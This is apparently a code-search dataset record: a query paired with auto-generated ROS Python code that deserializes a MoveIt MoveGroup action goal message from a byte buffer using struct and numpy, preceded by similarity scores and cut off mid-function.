"0.6936536", "0.69337714", "0.6931643", "0.6926454", "0.6892917", "0.6884027", "0.68481374", "0.6728073", "0.67206204", "0.66772145", "0.66661936", "0.6638984" ]
0.6807753
95
unpack serialized message in str into this message instance using numpy for array types
def deserialize_numpy(self, str, numpy): try: if self.header is None: self.header = std_msgs.msg.Header() if self.goal_id is None: self.goal_id = actionlib_msgs.msg.GoalID() if self.goal is None: self.goal = moveit_msgs.msg.MoveGroupGoal() end = 0 _x = self start = end end += 12 (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.header.frame_id = str[start:end].decode('utf-8') else: self.header.frame_id = str[start:end] _x = self start = end end += 8 (_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal_id.id = str[start:end].decode('utf-8') else: self.goal_id.id = str[start:end] _x = self start = end end += 12 (_x.goal.request.workspace_parameters.header.seq, _x.goal.request.workspace_parameters.header.stamp.secs, _x.goal.request.workspace_parameters.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.workspace_parameters.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.workspace_parameters.header.frame_id = str[start:end] _x = self start = end end += 60 (_x.goal.request.workspace_parameters.min_corner.x, _x.goal.request.workspace_parameters.min_corner.y, _x.goal.request.workspace_parameters.min_corner.z, _x.goal.request.workspace_parameters.max_corner.x, _x.goal.request.workspace_parameters.max_corner.y, _x.goal.request.workspace_parameters.max_corner.z, _x.goal.request.start_state.joint_state.header.seq, _x.goal.request.start_state.joint_state.header.stamp.secs, _x.goal.request.start_state.joint_state.header.stamp.nsecs,) = _get_struct_6d3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.start_state.joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.start_state.joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.joint_state.name = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.request.start_state.joint_state.name.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _x = self start = end end += 12 (_x.goal.request.start_state.multi_dof_joint_state.header.seq, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.secs, 
_x.goal.request.start_state.multi_dof_joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.start_state.multi_dof_joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.start_state.multi_dof_joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.request.start_state.multi_dof_joint_state.joint_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.Transform() _v445 = val1.translation _x = _v445 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v446 = val1.rotation _x = _v446 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.twist = [] for i in range(0, length): val1 = geometry_msgs.msg.Twist() _v447 = val1.linear _x = _v447 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v448 = val1.angular _x = _v448 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.twist.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.wrench = [] for i in range(0, length): val1 = geometry_msgs.msg.Wrench() _v449 = val1.force _x = _v449 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v450 = val1.torque _x = _v450 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.wrench.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.attached_collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.AttachedCollisionObject() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v451 = val1.object _v452 = _v451.header start = end end += 4 (_v452.seq,) = _get_struct_I().unpack(str[start:end]) _v453 = _v452.stamp _x = _v453 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v452.frame_id = str[start:end].decode('utf-8') else: _v452.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v451.id = str[start:end].decode('utf-8') else: _v451.id = str[start:end] _v454 = _v451.type start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v454.key = str[start:end].decode('utf-8') else: _v454.key = str[start:end] start = end end += 4 (length,) = 
_struct_I.unpack(str[start:end]) start = end end += length if python3: _v454.db = str[start:end].decode('utf-8') else: _v454.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v451.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v455 = val3.position _x = _v455 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v456 = val3.orientation _x = _v456 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v451.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v451.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v457 = val3.position _x = _v457 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v458 = val3.orientation _x = _v458 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v451.mesh_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.planes = [] for i in range(0, length): val3 = shape_msgs.msg.Plane() start = end end += 32 val3.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4) _v451.planes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.plane_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v459 = val3.position _x = _v459 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v460 = val3.orientation _x = _v460 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v451.plane_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v451.subframe_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v451.subframe_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v461 = val3.position _x = _v461 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v462 = val3.orientation _x = _v462 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = 
_get_struct_4d().unpack(str[start:end]) _v451.subframe_poses.append(val3) start = end end += 1 (_v451.operation,) = _get_struct_b().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.touch_links = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = str[start:end] val1.touch_links.append(val2) _v463 = val1.detach_posture _v464 = _v463.header start = end end += 4 (_v464.seq,) = _get_struct_I().unpack(str[start:end]) _v465 = _v464.stamp _x = _v465 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v464.frame_id = str[start:end].decode('utf-8') else: _v464.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v463.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v463.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v463.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v466 = val3.time_from_start _x = _v466 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) _v463.points.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.request.start_state.attached_collision_objects.append(val1) start = end end += 1 (self.goal.request.start_state.is_diff,) = _get_struct_B().unpack(str[start:end]) self.goal.request.start_state.is_diff = bool(self.goal.request.start_state.is_diff) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.goal_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.Constraints() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.name = str[start:end].decode('utf-8') else: val1.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.joint_name = str[start:end].decode('utf-8') else: val2.joint_name = str[start:end] _x = val2 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = 
_get_struct_4d().unpack(str[start:end]) val1.joint_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.position_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.PositionConstraint() _v467 = val2.header start = end end += 4 (_v467.seq,) = _get_struct_I().unpack(str[start:end]) _v468 = _v467.stamp _x = _v468 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v467.frame_id = str[start:end].decode('utf-8') else: _v467.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _v469 = val2.target_point_offset _x = _v469 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v470 = val2.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v470.primitives = [] for i in range(0, length): val4 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val4.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val4.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v470.primitives.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v470.primitive_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v471 = val4.position _x = _v471 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v472 = val4.orientation _x = _v472 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v470.primitive_poses.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v470.meshes = [] for i in range(0, length): val4 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.triangles = [] for i in range(0, length): val5 = shape_msgs.msg.MeshTriangle() start = end end += 12 val5.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val4.triangles.append(val5) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.vertices = [] for i in range(0, length): val5 = geometry_msgs.msg.Point() _x = val5 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val4.vertices.append(val5) _v470.meshes.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v470.mesh_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v473 = val4.position _x = _v473 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v474 = val4.orientation _x = _v474 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v470.mesh_poses.append(val4) start = end end += 8 (val2.weight,) = _get_struct_d().unpack(str[start:end]) val1.position_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.orientation_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.OrientationConstraint() _v475 = val2.header start = end end += 4 (_v475.seq,) = _get_struct_I().unpack(str[start:end]) _v476 = _v475.stamp _x = _v476 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end 
+= 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v475.frame_id = str[start:end].decode('utf-8') else: _v475.frame_id = str[start:end] _v477 = val2.orientation _x = _v477 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _x = val2 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.orientation_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.visibility_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val2.target_radius,) = _get_struct_d().unpack(str[start:end]) _v478 = val2.target_pose _v479 = _v478.header start = end end += 4 (_v479.seq,) = _get_struct_I().unpack(str[start:end]) _v480 = _v479.stamp _x = _v480 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v479.frame_id = str[start:end].decode('utf-8') else: _v479.frame_id = str[start:end] _v481 = _v478.pose _v482 = _v481.position _x = _v482 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v483 = _v481.orientation _x = _v483 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val2.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v484 = val2.sensor_pose _v485 = _v484.header start = end end += 4 (_v485.seq,) = _get_struct_I().unpack(str[start:end]) _v486 = _v485.stamp _x = _v486 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v485.frame_id = str[start:end].decode('utf-8') else: _v485.frame_id = str[start:end] _v487 = _v484.pose _v488 = _v487.position _x = _v488 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v489 = _v487.orientation _x = _v489 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _x = val2 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) val1.visibility_constraints.append(val2) self.goal.request.goal_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.path_constraints.name = str[start:end].decode('utf-8') else: self.goal.request.path_constraints.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.joint_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.joint_name = str[start:end].decode('utf-8') else: val1.joint_name = str[start:end] _x = val1 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.path_constraints.joint_constraints.append(val1) start = end end += 4 (length,) = 
_struct_I.unpack(str[start:end]) self.goal.request.path_constraints.position_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.PositionConstraint() _v490 = val1.header start = end end += 4 (_v490.seq,) = _get_struct_I().unpack(str[start:end]) _v491 = _v490.stamp _x = _v491 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v490.frame_id = str[start:end].decode('utf-8') else: _v490.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v492 = val1.target_point_offset _x = _v492 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v493 = val1.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v493.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v493.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v493.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v494 = val3.position _x = _v494 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v495 = val3.orientation _x = _v495 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v493.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v493.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v493.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v493.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v496 = val3.position _x = _v496 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v497 = val3.orientation _x = _v497 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v493.mesh_poses.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.request.path_constraints.position_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.orientation_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.OrientationConstraint() _v498 = val1.header start = end end += 4 (_v498.seq,) = _get_struct_I().unpack(str[start:end]) _v499 = _v498.stamp _x = _v499 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = 
_struct_I.unpack(str[start:end]) start = end end += length if python3: _v498.frame_id = str[start:end].decode('utf-8') else: _v498.frame_id = str[start:end] _v500 = val1.orientation _x = _v500 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _x = val1 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.path_constraints.orientation_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.visibility_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val1.target_radius,) = _get_struct_d().unpack(str[start:end]) _v501 = val1.target_pose _v502 = _v501.header start = end end += 4 (_v502.seq,) = _get_struct_I().unpack(str[start:end]) _v503 = _v502.stamp _x = _v503 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v502.frame_id = str[start:end].decode('utf-8') else: _v502.frame_id = str[start:end] _v504 = _v501.pose _v505 = _v504.position _x = _v505 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v506 = _v504.orientation _x = _v506 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val1.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v507 = val1.sensor_pose _v508 = _v507.header start = end end += 4 (_v508.seq,) = _get_struct_I().unpack(str[start:end]) _v509 = _v508.stamp _x = _v509 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v508.frame_id = str[start:end].decode('utf-8') else: _v508.frame_id = str[start:end] _v510 = _v507.pose _v511 = _v510.position _x = _v511 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v512 = _v510.orientation _x = _v512 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _x = val1 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) self.goal.request.path_constraints.visibility_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.trajectory_constraints.constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.Constraints() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.name = str[start:end].decode('utf-8') else: val1.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.joint_name = str[start:end].decode('utf-8') else: val2.joint_name = str[start:end] _x = val2 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = 
_get_struct_4d().unpack(str[start:end]) val1.joint_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.position_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.PositionConstraint() _v513 = val2.header start = end end += 4 (_v513.seq,) = _get_struct_I().unpack(str[start:end]) _v514 = _v513.stamp _x = _v514 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v513.frame_id = str[start:end].decode('utf-8') else: _v513.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _v515 = val2.target_point_offset _x = _v515 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v516 = val2.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v516.primitives = [] for i in range(0, length): val4 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val4.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val4.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v516.primitives.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v516.primitive_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v517 = val4.position _x = _v517 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v518 = val4.orientation _x = _v518 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v516.primitive_poses.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v516.meshes = [] for i in range(0, length): val4 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.triangles = [] for i in range(0, length): val5 = shape_msgs.msg.MeshTriangle() start = end end += 12 val5.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val4.triangles.append(val5) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.vertices = [] for i in range(0, length): val5 = geometry_msgs.msg.Point() _x = val5 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val4.vertices.append(val5) _v516.meshes.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v516.mesh_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v519 = val4.position _x = _v519 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v520 = val4.orientation _x = _v520 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v516.mesh_poses.append(val4) start = end end += 8 (val2.weight,) = _get_struct_d().unpack(str[start:end]) val1.position_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.orientation_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.OrientationConstraint() _v521 = val2.header start = end end += 4 (_v521.seq,) = _get_struct_I().unpack(str[start:end]) _v522 = _v521.stamp _x = _v522 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end 
